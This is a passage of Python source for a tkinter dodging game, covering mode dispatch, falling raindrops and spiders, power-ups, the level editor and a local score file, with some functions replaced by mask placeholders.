PhotoImage(file='umbrella2.gif')\n data.spider = PhotoImage(file='spider.gif')\n data.hourGlass = PhotoImage(file='hourGlass.gif')\n data.splashScreen = PhotoImage(file='splash.gif')\n init2(data)\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 
50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\ndef initScoreBoardHelp(data):\n data.tbgY = 5 * data.height / 12\n data.txtTScore = 150\n data.S_P = 220\n data.numScores = 5\n data.scorePos = data.height / 10\n data.scoreShift = 270\n data.helpY = data.height / 2 - 20\n data.name = ''\n data.printName = ''\n data.hit = False\n initAI(data)\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\ndef keyPressed(event, data):\n if data.mode == 'splashScreen':\n splashKeyPressed(event, data)\n elif data.mode == '1Player':\n playerKeyPressed(event, data)\n elif data.mode == '2Player':\n twoPlayerKeyPressed(event, data)\n elif data.mode == 'editor':\n editorKeyPressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedKeyPressed(event, data)\n elif data.mode == 'AI':\n AIKeyPressed(event, data)\n elif data.mode == 'difficulty':\n difficultyKeyPressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardKeyPressed(event, data)\n elif data.mode == 'help':\n helpKeyPressed(event, data)\n\n\ndef timerFired(data):\n if data.mode == 
'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\ndef splashScreenMousePressed(event, data):\n if (data.splashButtonY - 2 * data.r <= event.x <= data.splashButtonY + \n 2 * data.r):\n if data.p1ButtonX - data.r <= event.y <= data.p1ButtonX + data.r:\n data.mode = '1Player'\n if data.p2ButtonX - data.r <= event.y <= data.p2ButtonX + data.r:\n data.mode = '2Player'\n if data.edButton - data.r <= event.y <= data.edButton + data.r:\n data.mode = 'editor'\n if data.diffButton - data.r <= event.y <= data.diffButton + data.r:\n data.mode = 'difficulty'\n if data.helpButton - data.r <= event.y <= data.helpButton + data.r:\n data.mode = 'help'\n if data.sboardButton - data.r <= event.y <= data.sboardButton + data.r:\n data.mode = 'scoreboard'\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n 
rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) 
Scoreboard

 
 """
        , font='Arial 14 bold', fill='yellow')
    splashScreenButtons(canvas, data)


def writeFile(path, contents):
    """Overwrite the file at path with the given text."""
    with open(path, 'wt') as f:
        f.write(contents)


def readFile(path):
    """Return the entire text contents of the file at path."""
    with open(path, 'rt') as f:
        return f.read()


class Coconuts(object):
    """A falling rain-drop hazard, drawn as a small blue diamond."""

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.r = 9  # half-width of the diamond shape
        self.fill = 'deep sky blue'
        self.speed = 30  # pixels fallen per timer tick
        self.outline = 'blue'

    def draw(self, canvas):
        # Four-point polygon: top, left, bottom, right of the diamond.
        canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,
            self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=
            self.fill, outline=self.outline, width=3)

    def onTimerFired(self, data):
        # Fall straight down each tick.
        self.y += self.speed


def hit(data):
    """Resolve drop collisions with the single-player bug.

    A hit knocks the bug down by data.hitPenalty, removes the drop, and
    (depending on mode) costs a life or deducts score.
    """
    for coconut in data.coconuts:
        if data.mode == '1Player' or data.mode == 'levelCreated':
            if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:
                if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +
                    data.r):
                    data.cy += data.hitPenalty
                    if data.mode == 'levelCreated':
                        data.lives -= 1
                    elif data.hit == False and data.level < data.levelMax:
                        data.score -= data.level
                    data.coconuts.remove(coconut)
                    # NOTE(review): levelCreated hits decrement both
                    # data.lives (above) and data.levelEditorLives — confirm
                    # both counters are intended.
                    if data.mode == 'levelCreated':
                        data.levelEditorLives -= 1


def hit2Player(data):
    """Resolve drop collisions for each side of the two-player screen.

    Invincible players are skipped; otherwise a hit pushes that player
    down by data.hitPenalty and consumes the drop.
    """
    if data.mode == '2Player':
        if data.Invincible1 == False:
            for coconut in data.coconuts1:
                if (coconut.y >= data.player1Y - data.r and coconut.y <= 
                    data.player1Y + data.r):
                    if (coconut.x >= data.player1X - data.r and coconut.x <=
                        data.player1X + data.r):
                        data.player1Y += data.hitPenalty
                        data.coconuts1.remove(coconut)
        if data.Invincible2 == False:
            for coconut in data.coconuts2:
                if (coconut.y >= data.player2Y - data.r and coconut.y <= 
                    data.player2Y + data.r):
                    if (coconut.x >= data.player2X - data.r and coconut.x <=
                        data.player2X + data.r):
                        data.player2Y += data.hitPenalty
                        data.coconuts2.remove(coconut)


class PowerUps(Coconuts):
    """A falling power-up token; inherits drop motion from Coconuts."""

    def __init__(self, x, y):
        super().__init__(x, y)

    def draw(self, canvas, 
data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + 
data.r):
                    data.Invincible2 = True
                    data.start2 = data.player2Y
                    data.invincible.remove(powerUp)


class ScaryBug(object):
    """A spider hazard that rises from the bottom toward the players."""

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.speed = 25  # pixels climbed per tick (35 in 2Player/AI modes)

    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.spider)

    def onTimerFired(self, data):
        if data.mode == '2Player' or data.mode == 'AI':
            self.speed = 35
        self.y -= self.speed
        # NOTE(review): `and` binds tighter than `or`, so this parses as
        # '1Player' or ('levelCreated' and time % 8 == 0) — in 1Player mode
        # the bug side-steps every tick, not every 8th. Confirm intent.
        if (data.mode == '1Player' or data.mode == 'levelCreated' and data.
            time % 8 == 0):
            side = random.choice(data.sides)
            if side == 'l':
                if self.x - data.lane >= data.Player1Min:
                    self.x -= data.lane
                else:
                    self.x += data.lane
            elif side == 'r':
                if self.x + data.lane <= data.Player1Max:
                    self.x += data.lane
                else:
                    self.x -= data.lane


def hitScaryBug(data):
    """Resolve spider collisions.

    Single-player / editor: being caught is an instant loss (lives zeroed).
    2Player / AI: the player who touches the spider loses, so the other
    player is declared winner.
    """
    for bug in data.scaryBug:
        if data.mode == '1Player' or data.mode == 'levelCreated':
            if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *
                data.r):
                if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + 
                    1.5 * data.r):
                    data.hit = True
                    data.lives = 0
                    data.levelEditorLives = 0
        if data.mode == '2Player' or data.mode == 'AI':
            if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +
                data.r):
                if (bug.x >= data.player1X - data.r and bug.x <= data.
                    player1X + data.r):
                    data.winner = 'player2'
            if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +
                data.r):
                if (bug.x >= data.player2X - data.r and bug.x <= data.
                    player2X + data.r):
                    data.winner = 'player1'


def drawPowerups(canvas, data):
    """Draw every active spider, hourglass, and invincibility token."""
    for bug in data.scaryBug:
        bug.draw(canvas, data)
    for powerUp in data.powerUps:
        powerUp.draw(canvas, data)
    for powerUp in data.invincible:
        powerUp.draw(canvas, data)


def drawHome(canvas, data):
    """Draw the home button at its fixed (homeX, homeY) position."""
    canvas.create_image(data.homeX, data.homeY, image=data.home)


def checkHome(event, data):
    """Reset back to the splash screen when the home button is clicked."""
    if data.homeY - data.r <= event.y <= data.homeY + data.r:
        if data.homeX - data.r <= event.x <= data.homeX + data.r:
init(data)\n\n\ndef coconutShot(data):\n if data.level > 0 and data.pauseDrops == False:\n if data.time % int(data.levelMax / data.level\n ) == 0 or data.time % 6 == 0:\n xPosition1 = random.randint(0, data.Player1Min - data.buffer)\n xPosition2 = random.randint(data.Player1Max + data.buffer, data\n .width + data.buffer)\n data.coconuts.append(Coconuts(xPosition1, 0))\n data.coconuts.append(Coconuts(xPosition2, 0))\n xPosition4 = random.randint(data.Player1Min - data.buffer, data\n .Player1Max + data.buffer)\n data.coconuts.append(Coconuts(xPosition4, 0))\n if data.time % 5 == 0:\n xPosition3 = random.randint(0, data.Player1Min - data.buffer)\n data.coconuts.append(Coconuts(xPosition3, 0))\n if data.time % int(24 / data.level) == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.coconuts.append(Coconuts(data.Player1Min, 0))\n elif side == 'r':\n data.coconuts.append(Coconuts(data.Player1Max, 0))\n powerUpCoconutShot(data)\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\ndef playerKeyPressed(event, data):\n if data.level < data.levelMax and event.keysym == 'r':\n init(data)\n if event.keysym == 'Left' and data.cx >= data.Player1Min + data.lane / 2:\n data.cx -= data.lane / 2\n elif event.keysym == 'Right' and data.cx <= data.Player1Max:\n data.cx += data.lane / 2\n if data.level >= data.levelMax:\n if len(event.keysym) == 1:\n if len(data.name) < 15:\n data.name += event.keysym\n if event.keysym == 'BackSpace':\n data.name = data.name[0:-1]\n if event.keysym == 'Return':\n data.scoreList += data.score, data.name\n writeFile('score.txt', data.savedScores + str(data.score) + ',' +\n data.name + 
'\\n')\n data.mode = 'scoreboard'\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! 
Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 
750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, 
image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! 
You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\ndef checkLast(event, data):\n if data.last - data.r <= event.y <= data.last + data.r:\n if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 * data.r:\n data.powerUpsEditor = True\n data.yes, data.no = data.click, data.notClick\n if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r:\n data.powerUpsEditor = False\n data.no, data.yes = data.click, data.notClick\n if data.enter == data.click:\n if data.enterX - data.r <= event.y <= data.enterX + data.r:\n if data.medX - 2 * data.r <= 
event.x <= data.medX + 2 * data.r:\n data.mode = 'levelCreated'\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n 
drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for 
